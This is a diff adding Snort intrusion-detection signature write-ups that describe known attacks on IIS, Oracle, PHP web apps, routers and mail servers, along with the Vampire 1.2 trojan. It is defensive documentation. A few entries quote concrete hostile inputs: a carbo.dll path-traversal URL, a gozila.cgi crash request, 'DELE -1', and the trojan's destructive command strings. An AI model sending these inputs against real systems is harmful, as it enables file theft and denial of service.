+Remove the IISADMPWD virtual directory to disable remote password changes.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0407
+
+Bugtraq
+http://www.securityfocus.com/bid/2110
+
+--
--- /dev/null
+++ b/doc/signatures/3123.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3123
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2801.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2801
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure resume_master_activity
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3063.txt
@@ -0,0 +1,133 @@
+Rule: 
+
+--
+Sid: 
+3063
+
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection using
+the Vampire 1.2 trojan.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a
+complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Vampire 1.2 uses port 1020 by default. This port cannot be changed by the attacker. 
+
+The following is a list of the commands for many of Vampier 1.2's functions
+(Command Name: Command String):
+
+Chat With Victim: chat
+Clear Recent Folder: cleardoc
+Close Windows: endwin
+Corrupt File: currfile
+Crazy Mouse: crazy
+Delete Directory: deletedir
+Delete File: delete
+Disk Space Left: space
+Disable CTRL-ALT-DEL: ctrldisable
+Enable CTRL-ALT-DEL: ctrlenable
+Fill Hard Drive: fillhd
+Find File: findfiles
+Format: format
+Get Active Windows: getact
+Get ICQ Number: geticq
+Get Local Time: gettime
+Get Operating System: getos
+Get Server Path: getpath
+Get System Owner: getowner
+Get Temp Directory: gettemp
+Get Windows Directory: getwin
+Get Current User: getname
+Get Disk Serial Number: getserial
+Get Hard Drive: gethd
+Get Organization: getorg
+Hang Up Modem: hangup
+ISP Account Info: ispinfo
+Kill Window: killtask\
+Logoff: logoff
+Make Directory: makedir
+Monitor Off: monitoroff
+Monitor On: monitoron
+Hide Mouse: hidemouse
+Show Mouse: showmouse
+Open Control Panel: panel
+Open Date And Time: date
+Open CD-ROM: cdopen
+Close CD-ROM: cdclose
+Open URL: www\
+Ping: ping
+Read A Drive: reada
+Reboot: reboot
+Kill Registry: regfuck
+Run Program: run
+Screenshot: screenshot
+Send Keys: text
+Send Message: sndmsg
+Set Computer Name: pcname
+Set Volume Label: setvolumelabel
+Shutdown: shutdown
+Hide Task Bar: hidetask
+Show Task Bar: showtask
+Wacky CR-ROM: wackycd
+--
+Affected Systems:
+Windows 95/98/ME
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because
+they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually
+will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the
+attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has
+installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+In order to get rid of it, you must kill the following processes:
+vampire.exe or (if not there) server.exe
+
+You must delete the following files from your hard drive:
+vampire.exe or (if not there) server.exe
+
+Keep your anti-virus software updated.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+Pestpatrol:
+http://www.pestpatrol.com/pestinfo/v/vampire_1_2.asp
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/vampire/index.shtml
+
+--
--- /dev/null
+++ b/doc/signatures/100000127.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000127
+
+-- 
+Summary: 
+This event is generated when an attempt is made to link to an external script 
+as part of the Stadtaus.com PHP Form Mail program.
+
+-- 
+
+Impact: 
+The script being included will be run in the same security context as the 
+vulnerable program, enabling a variety of web-based attacks.
+
+--
+Detailed Information:
+The Stadtaus.com PHP Form Mail system's formmail.inc.php module, when including 
+other scripts by way of its script_root parameter, fails to validate the 
+location of these scripts, and thus allows attackers to include any malicious 
+script anywhere on the web. The included script will be executed with the same 
+permissions and in the same security context at the vulnerable program itself, 
+thus allowing a range of attacks.
+
+--
+Affected Systems:
+Stadtaus.com PHP Form Mail Script 2.3
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no vendor-supplied patches or workarounds. However, if it 
+is possible to globally disable PHP's 'allow_url_fopen' and 'register_globals' 
+directives in your environment, doing so may disable this vulnerability. 
+However, turning off these directives should be tested in a non-production 
+environment, in case doing so breaks other scripts on your system.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/429.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+429
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Bad SPI datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 0 datagrams are an indication that a received datagram has an invalid SPI that is invalid or has expired.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 0 datagrams are generated when a received datagram includes a SPI (Security Parameters Index) that is invalid or has expired.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
--- /dev/null
+++ b/doc/signatures/1623.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1623
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2225.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2225
+
+--
+Summary:
+This event is generated when an attempt is made to access gozila.cgi on an internal web server. This may indicate an attempt to exploit a denial of service vulnerability in the Linksys Etherfast BEFSR41 Cable/DSL Router web interface.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+The Linksys Etherfast BEFSR41 Cable/DSL router web interface, Gozila.cgi, contains a denial of service vulnerability where, if a request is made for gozila.cgi is made without any arguments, the router crashes.
+
+--
+Affected Systems:
+Linksys Etherfast BEFSR41 Cable/DSL routers running firmware version 1.42.7 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends http://routerhostname/gozilla.cgi? to a vulnerable router (where routerhostname is the router's host name). The router will crash.
+ 
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses gozila.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade your router firmware to 1.43 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6086
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1236
+
+--
--- /dev/null
+++ b/doc/signatures/812.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+812
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2882.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2882
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/613.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+613
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2155.txt
@@ -0,0 +1,60 @@
+Rule:
+ 
+--
+Sid:
+2155
+
+--
+Summary:
+This event is generated when a remote user attempts to access forum/index.php with the template parameter on a web server. This may indicate an attempt to exploit a remote code execution vulnerability in ttForum, a web-based bulletin board application.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to a remote root compromise.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in ttForum, a web-based bulletin board application. When an attacker sends a request to forum/index.php with a remote PHP file included in the "template" parameter, the web server will execute the code included in the linked PHP file.  
+
+--
+Affected Systems:
+Any server running ttForum.
+
+--
+Attack Scenarios:
+An attacker writes a PHP file containing executable code, and then sends a URI request to the forum/index.php on the vulnerable server with the crafted PHP file included in the template parameter. The web server will then attempt to execute the commands included in the linked PHP file.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched in recent versions. Contact the vendor (http://www.ttcms.com) for more details. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11615
+
+--
--- /dev/null
+++ b/doc/signatures/1317.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1317
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "anal sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "anal sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.  This rule could trigger on a medical website or any site discussing sex, pornographic or not.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/2121.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2121
+
+--
+Summary:
+This event is generated when a remote user uses a negative argument in the DELE command sent to port 110 on an internal server.  This may indicate an attempt to exploit a boundary checking vulnerability in the POP DELE command in the Alt-N MDaemon mail server.
+
+--
+Impact:
+The service will crash when it attempts to process the command. The attacker must have a valid POP account on the mail server to attempt this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a boundary checking vulnerability in the DELE command on the Alt-N MDaemon POP server. If an authenticated user sends the DELE command with a negative argument to the POP server, the MDaemon service will crash when it attempts to process the command. Note that this exploit can only be attempted by an authenticated user with a valid IMAP account on the server.
+
+--
+Affected Systems:
+Any operating system that runs the following IMAP servers:
+  -Alt-N MDaemon 6.0.0
+  -Alt-N MDaemon 6.0.5
+  -Alt-N MDaemon 6.0.6
+  -Alt-N MDaemon 6.0.7
+
+
+--
+Attack Scenarios:
+An authenticated user can send a DELE -1 command to the POP server, which will cause the service to crash.
+
+--
+Ease of Attack:
+Simple. Exploits and proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Alt-N MDaemon 6.5.0 or later.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7445
+http://www.securityfocus.com/bid/6053
+
+--
--- /dev/null
+++ b/doc/signatures/100000558.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000558
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "pag" parameter in the "messages.php" script 
+used by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000523.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000523
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "CavoxCms" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "page" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "page" parameter in the "index.php" script used by the 
+"CavoxCms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CavoxCms
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/885.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+885
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000103.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000103
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 7649, where 
+Breed game servers typically listen.
+
+-- 
+
+Impact: 
+Upon receiving such a packet, the server will crash, causing a denial of 
+service condition.
+
+--
+Detailed Information:
+Breed game servers will pass a NULL pointer upon receiving an empty UDP packet 
+on port 7649, causing an immediate crash. The server must be restarted for 
+service to resume.
+
+--
+Affected Systems:
+Brat Designs Breed 
+Brat Designs Breed Patch #1
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1001.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1001
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability on an iCat Carbo Server.
+
+--
+Impact:
+Serious. Information disclosure.
+
+--
+Detailed Information:
+The iCat Carbo server, which is part of the Electronic Commerce Suite, 
+does not properly check HTTP requests and will give access to any file 
+object residing on the system when it receives a request such as 
+http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=catalog
+
+--
+Affected Systems:
+	iCat Electronica Commerce Suite 3.0 
+
+--
+Attack Scenarios:
+An attacker can view any file on the server, including sensitive 
+password files. The information disclosed can then be used to facilitate
+further attacks on the system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+None known.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2126
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1069
+
+--
--- /dev/null
+++ b/doc/signatures/1385.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1385
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000357.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000357
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_stat_common.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_stat_common.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1945.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1945
+
+--
+Summary:
+This event is generated when an attempt is made use Microsoft double encoding of a "/" in a URL request.  This may permit an attacker to navigate to files and directories outside the web root of a vulnerable Internet Information Services (IIS) server. 
+
+--
+Impact:
+Remote access.  This attack can allow an attacker to execute commands a vulnerable IIS server. 
+
